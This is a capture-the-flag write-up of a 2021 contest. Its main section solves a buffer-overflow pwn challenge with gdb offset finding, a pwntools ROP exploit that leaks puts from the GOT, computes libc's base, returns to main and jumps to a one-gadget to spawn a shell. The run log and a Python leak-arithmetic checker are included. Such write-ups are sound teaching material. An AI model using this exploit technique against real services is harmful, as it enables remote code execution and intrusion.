This contest was held from 2021/11/6 12:00 (JST) to 2021/11/7 12:00 (JST).
I took part as a team again this time. We finished with 268 points, 75th out of 314 teams.
I'm writing up the challenges I solved myself.
Welcome (welcome)
After joining the Discord and reading the messages in the #announcements channel, the flag was posted there.
Neko{me0w_much_p0in75_wi11_y0u_ge7?}
BabyBOF:RCE (pwn)
Leak a GOT entry, compute the libc base address from it, then return to main and use One Gadget RCE on the second pass.
$ gdb -q ./vuln
Reading symbols from ./vuln...(no debugging symbols found)...done.
gdb-peda$ pattc 100
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL'
gdb-peda$ r
Starting program: /mnt/hgfs/Shared/vuln
Enter your feedback: AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL'
Thank you!

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers----------------------------------]
RAX: 0x0
RBX: 0x0
RCX: 0x7ffff7af2224 (<__GI___libc_write+20>:	cmp    rax,0xfffffffffffff000)
RDX: 0x7ffff7dcf8c0 --> 0x0
RSI: 0x7ffff7dce7e3 --> 0xdcf8c0000000000a
RDI: 0x1
RBP: 0x401210 (<__libc_csu_init>:	endbr64)
RSP: 0x7fffffffde68 ("IAAeAA4AAJAAfAA"...)
RIP: 0x40111b (<main+107>:	ret)
R8 : 0xa (b'\n')
R9 : 0x0
R10: 0x0
R11: 0x246
R12: 0x401120 (<_start>:	endbr64)
R13: 0x7fffffffdf40 --> 0x1
R14: 0x0
R15: 0x0
[------------------------------------code-------------------------------------]
Display various information of current execution context
Usage:
    context [reg,code,stack,all] [code/stack length]

0x000000000040111b in main ()
gdb-peda$ patto IAAeAA4AAJAAfAA
IAAeAA4AAJAAfAA found at offset: 72

$ ROPgadget --binary ./vuln | grep "pop rdi"
0x0000000000401273 : pop rdi ; ret

$ one_gadget libc-2.31.so
0xe6c7e execve("/bin/sh", r15, r12)
constraints:
  [r15] == NULL || r15 == NULL
  [r12] == NULL || r12 == NULL

0xe6c81 execve("/bin/sh", r15, rdx)
constraints:
  [r15] == NULL || r15 == NULL
  [rdx] == NULL || rdx == NULL

0xe6c84 execve("/bin/sh", rsi, rdx)
constraints:
  [rsi] == NULL || rsi == NULL
  [rdx] == NULL || rdx == NULL
from pwn import *

if len(sys.argv) == 1:
    p = remote('pwn2.bsidesahmedabad.in', 9001)
else:
    p = process('./vuln')

elf = ELF('./vuln')
libc = ELF('./libc-2.31.so')

pop_rdi_addr = 0x401273          # pop rdi ; ret (from ROPgadget)
puts_got_addr = elf.got['puts']
puts_plt_addr = elf.plt['puts']
main_addr = elf.symbols['main']
one_gadget_addr = 0xe6c81        # execve("/bin/sh", r15, rdx) (from one_gadget)

# 1st pass: puts(puts@got) leaks a libc address, then return to main
payload = 'A' * 72               # offset to the saved return address
payload += p64(pop_rdi_addr)
payload += p64(puts_got_addr)
payload += p64(puts_plt_addr)
payload += p64(main_addr)

data = p.recvline().rstrip()
print data
print payload
p.sendline(payload)
data = p.recvline().rstrip()
print data

# puts stops at the first NUL byte, so a 6-byte pointer plus newline comes back
data = p.recv(7).rstrip()
print data
leaked_puts_got = u64(data + '\x00\x00')
log.info('leaked puts got address: ' + hex(leaked_puts_got))
libc_base = leaked_puts_got - libc.symbols['puts']
log.info('libc base address: ' + hex(libc_base))
system_addr = libc_base + libc.symbols['system']
log.info('system address: ' + hex(system_addr))

# 2nd pass: overwrite the return address with the one gadget
payload = 'A' * 72
payload += p64(libc_base + one_gadget_addr)

data = p.recvline().rstrip()
print data
print payload
p.sendline(payload)
data = p.recvline().rstrip()
print data

p.interactive()
The execution output is as follows.
[+] Opening connection to pwn2.bsidesahmedabad.in on port 9001: Done
[*] '/mnt/hgfs/Shared/vuln'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[*] '/mnt/hgfs/Shared/libc-2.31.so'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
Enter your feedback:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAs\x12\x00\x00\x00@@\x00\x00\x00\x10\x00\x00\x00\x10\x00\x00\x00
Thank you!
\xa0u%/r\x7f
[*] leaked puts got address: 0x7f722f2575a0
[*] libc base address: 0x7f722f1d0000
[*] system address: 0x7f722f225410
Enter your feedback:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x81l+/r\x7f\x00
Thank you!
[*] Switching to interactive mode
$ ls
flag-5e95a44ed973de7e2bbf18e0e76ad496.txt
vuln
$ cat flag-5e95a44ed973de7e2bbf18e0e76ad496.txt
Neko{Th4t's_4_n1c3_f33db4ck}
Neko{Th4t's_4_n1c3_f33db4ck}
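As an added cross-check of the leak arithmetic above (this is not part of the original writeup), the following Python 3 snippet rebuilds the 6-byte puts pointer printed in the log, derives the libc base and verifies that it is page aligned, which is the quickest sign that the libc offsets match the remote build. The puts and system offsets (0x875a0 and 0x55410) are computed from the logged addresses rather than read from libc, and the function names are my own.

```python
import struct

# Offsets derived from the addresses printed in the run above (assumed, not read from libc):
PUTS_OFFSET = 0x875a0        # 0x7f722f2575a0 - 0x7f722f1d0000
SYSTEM_OFFSET = 0x55410      # 0x7f722f225410 - 0x7f722f1d0000
ONE_GADGET_OFFSET = 0xe6c81  # execve("/bin/sh", r15, rdx) from the one_gadget output


def leak_to_address(leak: bytes) -> int:
    """Rebuild a pointer leaked through puts().

    puts() stops at the first NUL byte, so a 64-bit userland pointer whose top two
    bytes are zero arrives as 6 bytes; pad on the right (little-endian high bytes)."""
    if not 1 <= len(leak) <= 8:
        raise ValueError("unexpected leak length %d" % len(leak))
    return struct.unpack('<Q', leak.ljust(8, b'\x00'))[0]


def libc_addresses(leaked_puts: int) -> dict:
    """Derive libc base and the two targets used by the exploit from the puts leak."""
    base = leaked_puts - PUTS_OFFSET
    # libc is mmap'd on a page boundary; a misaligned base means the offsets belong
    # to a different libc build than the one the remote service is running.
    if base & 0xfff:
        raise ValueError("libc base 0x%x is not page aligned: wrong libc?" % base)
    return {
        'base': base,
        'system': base + SYSTEM_OFFSET,
        'one_gadget': base + ONE_GADGET_OFFSET,
    }


def pack_address(addr: int) -> bytes:
    """Little-endian 8-byte encoding, the same thing pwntools' p64() produces."""
    return struct.pack('<Q', addr)


if __name__ == '__main__':
    # The 6 bytes shown in the log right after "Thank you!" (constructed from the page).
    leak = b'\xa0u%/r\x7f'
    addrs = libc_addresses(leak_to_address(leak))
    for name, value in addrs.items():
        print("%-10s 0x%x" % (name, value))
    print("2nd payload tail:", pack_address(addrs['one_gadget']))
```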
Survey (survey)
After answering the survey, the flag was displayed.
Neko{thank-you-for-playing-and-answering-the-survey!}